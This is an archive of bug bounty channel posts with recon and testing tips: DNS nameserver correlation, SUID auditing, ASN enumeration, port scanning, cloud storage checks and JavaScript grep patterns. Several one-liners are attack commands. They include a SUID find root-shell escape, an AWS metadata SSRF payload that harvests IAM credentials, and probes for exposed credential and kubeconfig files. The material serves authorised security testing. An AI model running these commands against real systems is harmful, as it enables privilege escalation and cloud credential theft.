Bug Bounty Diary

A diary documenting the journey of finding bugs, with daily notes and useful tricks. Follow for real experiences, discoveries, and practical tips in bug bounty hunting. Group: @BugBounty_Forum

Posts archive
-----‐-------------------------------
✎ Discovering Domains via NS Correlation
-----‐-------------------------------

● What is a Nameserver?
A nameserver (NS) is a specialised server within the Domain Name System (DNS) which translates human-readable domain names into IP addresses. Essentially, nameservers tell the internet where to find your web server. In this post I will describe a simple technique which can be used to correlate one or more websites using NS data.

● Finding Nameservers
To find the nameservers for a domain name, the simplest way is to use the dig tool:
$ dig +noall +answer ns deliveroo.com
deliveroo.com.          86400   IN      NS      mona.ns.cloudflare.com.
deliveroo.com.          86400   IN      NS      phil.ns.cloudflare.com.

● Finding Related Domains
Some DNS providers like Cloudflare will assign you an NS pair at the account level. This means that all domain names you add to your account will share the same NS pair. In the example above, deliveroo.com uses the Cloudflare nameserver pair mona.ns.cloudflare.com and phil.ns.cloudflare.com. Domains added under the same Cloudflare account are often assigned the same NS pair. Since the number of possible Cloudflare NS pair combinations is limited, many domains share them, making it relatively easy to identify other domains that may be managed by the same operator.

● Downloading The Dataset
Merklemap provides a DNS record database containing 4 billion+ records. You can download it here. The dataset is provided in JSONL format and is compressed using xz. The uncompressed raw data is around 500GB in size. If you just want to extract domain/NS pairs in the format domain,ns1,ns2,ns... you can use xzcat with jq like so:
xzcat dns_records_database.jsonl.xz | jq -r '
  select([.results[] | .success?.records?.NS? // empty] | length > 0) |
  [.hostname] + [.results[].success?.records?.NS? // empty | .[]] |
  join(",")
' > domains.csv

● Querying the Dataset
One way to query the parsed data is using DuckDB. grep will also work but will probably be a bit slower.
NS1="phil.ns.cloudflare.com."
NS2="mona.ns.cloudflare.com."
duckdb -csv -noheader -c "
  SELECT column0 AS domain, column1 AS ns
  FROM read_csv('domains.csv', header=false)
  WHERE list_sort(str_split(column1, ',')) = list_sort(['${NS1}','${NS2}'])
" > results.csv
Looking at results.csv we have ~300 entries. A lot are false positives, but there are some new domains which definitely belong to the same operator:
$ grep -i deliveroo results.csv | cut -d, -f1
deliveroo.de
deliveroo.blog
deliveroo.xn--9dbq2a
... 32 more
In a lot of cases you might not be able to correlate one website to another based on just a keyword in the domain name. In those cases you can do things like:
• Fingerprint HTTP responses
• Compare WHOIS information
• Compare technologies used
• DNS similarities
#bugbounty #recon #DNS © T.me/BugBounty_Diary
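The correlation step above, redone as an added Python example (not the post's own code): it parses the domain,ns1,ns2,... rows the jq pipeline writes, normalises case and the trailing dot so dig-style and bare names compare equal, tolerates rows with any number of nameservers, and counts how many domains share a given NS set as a rough gauge of how weak a match is. The rows below are constructed for illustration, not taken from the Merklemap dataset.

```python
import csv
import io
from collections import Counter

# Constructed rows in the domain,ns1,ns2,... layout the jq pipeline writes
# (illustrative only, not taken from the Merklemap dataset).
SAMPLE_CSV = """\
deliveroo.com,mona.ns.cloudflare.com.,phil.ns.cloudflare.com.
deliveroo.de,phil.ns.cloudflare.com.,mona.ns.cloudflare.com.
example.org,Mona.NS.Cloudflare.com,phil.ns.cloudflare.com
unrelated.net,ns1.example-dns.net.,ns2.example-dns.net.
three-ns.io,mona.ns.cloudflare.com.,phil.ns.cloudflare.com.,ns3.other.example.
"""

def normalize_ns(name: str) -> str:
    """DNS names are case-insensitive and dig appends a trailing dot; fold both."""
    return name.strip().lower().rstrip(".")

def parse_ns_rows(text: str):
    """Yield (domain, frozenset of normalized NS names); rows may carry any NS count."""
    for row in csv.reader(io.StringIO(text)):
        if len(row) < 2 or not row[0]:
            continue
        domain, *nameservers = row
        yield domain.lower(), frozenset(normalize_ns(n) for n in nameservers if n)

def correlate_by_ns(text: str, nameservers, exact: bool = True) -> list:
    """Domains whose NS set equals the target (exact) or merely contains it (exact=False)."""
    target = frozenset(normalize_ns(n) for n in nameservers)
    hits = []
    for domain, ns_set in parse_ns_rows(text):
        if (ns_set == target) if exact else (target <= ns_set):
            hits.append(domain)
    return sorted(hits)

def ns_set_frequency(text: str) -> Counter:
    """How many domains share each NS set; a large count means weak evidence of common ownership."""
    return Counter(ns_set for _, ns_set in parse_ns_rows(text))
```

Run correlate_by_ns over the real domains.csv text with the NS pair from dig, then check ns_set_frequency for that pair before treating any hit as more than a lead.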

-----‐-------------------------------
✎ Linux Security → SUID & Privilege Boundaries
-----‐-------------------------------

In Linux, security heavily depends on permission architecture. One critical mechanism is SUID (Set User ID).

● What is SUID?
When SUID is applied to an executable, it runs with the file owner's permissions instead of the executing user's. If the file is owned by root, it grants elevated privileges.
[me@linux ~]$ ls -l /usr/bin/passwd
-rwsr-xr-x 1 root root ...
The s indicates SUID. This allows normal users to run passwd, which needs root access to update /etc/shadow. SUID itself is legitimate; misconfigured SUID binaries are dangerous. If powerful binaries like bash, vim or find are improperly assigned SUID, they may be abused for privilege escalation.

● Enumerating SUID Binaries
find / -perm -4000 -type f 2>/dev/null
This way we can find the files with SUID.

● A Usage Example
Let's say find has SUID:
find . -exec /bin/sh -p \; -quit
With this you can open a shell as root.

● To Audit
Find the files with SUID as shown above and remove the bit:
chmod u-s /path/to/binary
#bugbounty #Linux © T.me/BugBounty_Diary
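An audit script for the enumeration and remediation steps above, added here as an example (not from the post): it walks a tree the way find -perm -4000 -type f does, flags SUID files whose names match the interpreters and tools the post calls dangerous, notes whether root owns them, and strips the bit as chmod u-s would. The allowlist and the lab directory it builds are constructed for illustration.

```python
import os
import stat
import tempfile

# Constructed allowlist of binaries that normally carry SUID on a distribution.
EXPECTED_SUID = {"passwd", "sudo", "su", "mount", "umount", "chsh", "newgrp"}
# Interpreters and file tools the post names as dangerous when SUID.
HIGH_RISK = {"bash", "sh", "dash", "vim", "vi", "find", "python3", "perl"}

def is_suid(path: str) -> bool:
    """True for a regular file with the set-user-ID bit (the 's' in -rwsr-xr-x)."""
    st = os.lstat(path)
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & stat.S_ISUID)

def enumerate_suid(root: str):
    """Walk root like `find / -perm -4000 -type f`, ignoring unreadable dirs."""
    for dirpath, _dirs, files in os.walk(root, onerror=lambda err: None):
        for name in files:
            path = os.path.join(dirpath, name)
            if is_suid(path):
                yield path

def classify(path: str) -> str:
    """Return 'high-risk', 'expected' or 'review' based on the binary name."""
    name = os.path.basename(path)
    if name in HIGH_RISK:
        return "high-risk"
    return "expected" if name in EXPECTED_SUID else "review"

def audit_suid(root: str) -> dict:
    """Map every SUID file under root to its class and whether root owns it."""
    return {
        p: {"class": classify(p), "root_owned": os.lstat(p).st_uid == 0}
        for p in enumerate_suid(root)
    }

def strip_suid(path: str) -> None:
    """Remediation from the post, equivalent to `chmod u-s path`."""
    mode = stat.S_IMODE(os.lstat(path).st_mode)
    os.chmod(path, mode & ~stat.S_ISUID)

def make_demo_tree() -> str:
    """Constructed lab dir: SUID 'find' (bad), SUID 'passwd' (expected), plain 'ls'."""
    root = tempfile.mkdtemp(prefix="suid-lab-")
    for name, mode in (("find", 0o4755), ("passwd", 0o4755), ("ls", 0o755)):
        path = os.path.join(root, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\nexit 0\n")
        os.chmod(path, mode)
    return root
```

Point audit_suid at "/" on a real host to get the same list the find command produces, with each entry already sorted into expected, high-risk or needs-review.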

✎ CompTIA Network+ Summary - Module 3
Module 3 is now live on my Hashnode series.
--Interfaces & Switches--
As always stripped down to the essentials with no fluff.
• Blog: Network+ Summary - Module 3

✎ ASN → IP Recon Workflow (BGPView alternative)
I used to rely on bgpview.io for extracting IP ranges from ASNs; it was free and useful for recon workflows. But after it went down, I looked for an alternative and found this awesome repo:
• as-ip-blocks: Github
It lets you pull IPv4/IPv6 prefixes per ASN directly from raw GitHub data, which is ideal for automation.

</> Bash Function for ASN → IP Enumeration
You can plug this directly into your recon pipeline or customize it for your tools.
asn2ip() {
  local base="https://raw.githubusercontent.com/ipverse/as-ip-blocks/master/as"

  fetch_asn() {
    curl -fsSL "$base/$1/aggregated.json" \
      | jq -r '.prefixes.ipv4[]?' 2>/dev/null \
      | sort -u
  }

  if [ ! -t 0 ]; then
    while IFS= read -r asn; do
      fetch_asn "$asn"
    done
  else
    fetch_asn "$1"
  fi
}
• Single ASN → IP Ranges
asn2ip 1234
• List of ASNs → IP Ranges
cat asnList | asn2ip
#bugbounty #recon #automation © T.me/BugBounty_Diary

✎ CompTIA Network+ Summary - Module 2
Module 2 is now live on my Hashnode series. Stripped down to the essentials, focusing only on what actually matters for understanding networks from a cybersecurity perspective.
• Blog: Network+ Summary - Module 2
#bugbounty #network © T.me/BugBounty_Diary

Repost from Bug Bounty Diary
✎ IP Spoofing to Account Takeover: You Patched It? Really?
In my previous article, I described how I found a security flaw in a popular desktop app's OAuth flow that allowed me to steal any user's account with just one click. I reported it, saw it patched, and then bypassed the patch again. Since the process of bypassing and exploiting the flaw is interesting to me, I decided to write a second article about it.
• Blog: IP Spoofing to Account Takeover
#bugbounty #ipspoofing #oauth © T.me/BugBounty_Diary

If you have any questions regarding this writeup, feel free to ask me at @Spix0r

✎ Tuning Time, Depth, and Accuracy in Port Scanning
Different port scanners excel in different aspects:
• Nmap → depth
• MassScan → scalability
• Naabu → simplicity
• RustScan → speed

Naabu + Nmap
1. Service version detection
naabu -host http://example.com -p 80,443,8080 -nmap-cli 'nmap -sV -sC'
2. Full vuln scan on discovered ports
naabu -l targets.txt -top-ports 1000 -nmap-cli 'nmap -sV --script vuln -oN nmap-vuln.txt'
3. Quick banner grab + OS detection
naabu -host 10.0.0.0/24 -p 22,80,443 -nmap-cli 'nmap -sV -O --script banner -oG results.gnmap'
• The flow: Naabu finds open ports fast → pipes them to nmap for deeper enumeration. Best of both worlds.
#bugbounty #recon #portscan © T.me/BugBounty_Diary

✎ CompTIA Network+ Summary - Module 1
I've decided to summarize the CompTIA Network+ book through the lens of security. My goal is to keep only the parts that truly matter for cybersecurity, ethical hacking, and bug bounty, and to remove the noise. Module 1 is now ready, and I'm excited to share it with you. Hope you find it useful and insightful.
• Blog: https://amir-fard.gitbook.io/amir-fard-docs/
#bugbounty #network © T.me/BugBounty_Diary

I can't hunt for bugs anymore with this connectivity (only one Cloudflare IP is open here, which is behind ChatGPT! currently, all the traffic from Iran goes through there :))) Can anyone share the latest bug bounty tips or tricks in the comments?👇

✎ Burp Extension for API Testing in JS-Rich Targets
This tool helps identify endpoints, files, internal emails, and some secrets hidden in minified JavaScript, achieving maximum efficiency while minimizing noise in the results.
• Repository: Github
#bugbounty #recon #javascript #burp © T.me/BugBounty_Diary

Hey dear subscribers,
This channel has been inactive for one week because Iran's government shut down the entire internet, preventing us from accessing free internet as usual. I was very worried about my open reports and this channel. Starting today, I am working hard and focusing on posting more content.
Thank you all, 🕷 Spix0r

I'm alive, just not hunting for a while, and writing a new write-up.

Cloud Security One Liners
• AWS S3 Bucket Finder
cat urls.txt | grep -oE "[a-zA-Z0-9.-]+\.s3\.amazonaws\.com" | anew s3_buckets.txt
cat urls.txt | grep -oE "s3://[a-zA-Z0-9.-]+" | anew s3_buckets.txt
• S3 Permission Check
cat s3_buckets.txt | xargs -I@ sh -c 'aws s3 ls s3://@ --no-sign-request 2>/dev/null && echo "OPEN: @"'
• Firebase Database
cat urls.txt | grep -oE "[a-zA-Z0-9-]+\.firebaseio\.com" | xargs -I@ curl -s @/.json | grep -v "null"
• Azure Blob Storage
cat urls.txt | grep -oE "[a-zA-Z0-9-]+\.blob\.core\.windows\.net" | anew azure_blobs.txt
• GCP Storage
cat urls.txt | grep -oE "storage\.googleapis\.com/[a-zA-Z0-9-]+" | anew gcp_buckets.txt
• AWS Metadata SSRF
cat urls.txt | gf ssrf | qsreplace "http://169.254.169.254/latest/meta-data/iam/security-credentials/" | httpx -silent -ms "AccessKeyId"
• Cloud Credential Files
cat alive.txt | httpx -silent -path /.aws/credentials,/.docker/config.json,/kubeconfig -mc 200 | anew cloud_creds.txt
#bugbounty #recon #cloud © T.me/BugBounty_Diary

Just wanted to inform you that Writeup-Miner is now live on @Daily_Writeups. Join if you want the latest Bug Bounty and Cybersecurity write-ups.  Thank you all ♥️🙌

Grep tips for JavaScript Analysis
• Extracting JavaScript Files from recursive Directories
find /path/to/your/folders -name "*.js" -exec mv {} /path/to/target/folder/ \;
• Searching for API Keys and Secrets
grep -rE "apikey|api_key|secret|token|password|auth|key|pass|user" /path/to/js/files
• Detecting Dangerous Function Calls
grep -rE "eval|document\.write|innerHTML|setTimeout|setInterval|Function" /path/to/js/files
• Checking for URL Manipulation
grep -rE "location\.href|location\.replace|location\.assign|window\.open" /path/to/js/files
• Searching for Cross-Origin Requests
grep -rE "XMLHttpRequest|fetch|Access-Control-Allow-Origin|withCredentials" /path/to/js/files
• Analyzing postMessage Usage
grep -r "postMessage" /path/to/js/files
• Finding Hardcoded URLs or Endpoints
grep -rE "https?://|www\." /path/to/js/files
• Locating Debugging Information
grep -rE "console\.log|debugger|alert|console\.dir" /path/to/js/files
• Investigating User Input Handling
grep -rE "document\.getElementById|document\.getElementsByClassName|document\.querySelector|document\.forms" /path/to/js/files
#bugbounty #recon #javascript © T.me/BugBounty_Diary

✎ Deobfuscate obfuscator.io, unminify, transpile, and unpack webpack/browserify, using webcrack to resemble the original source code as much as possible.
Command Line Interface
npm install -g webcrack
Examples
webcrack input.js
webcrack input.js > output.js
webcrack bundle.js -o output-dir
• Repository: Github
• Website: webcrack.netlify.app
#bugbounty #recon #javascript #deobfuscate © T.me/BugBounty_Diary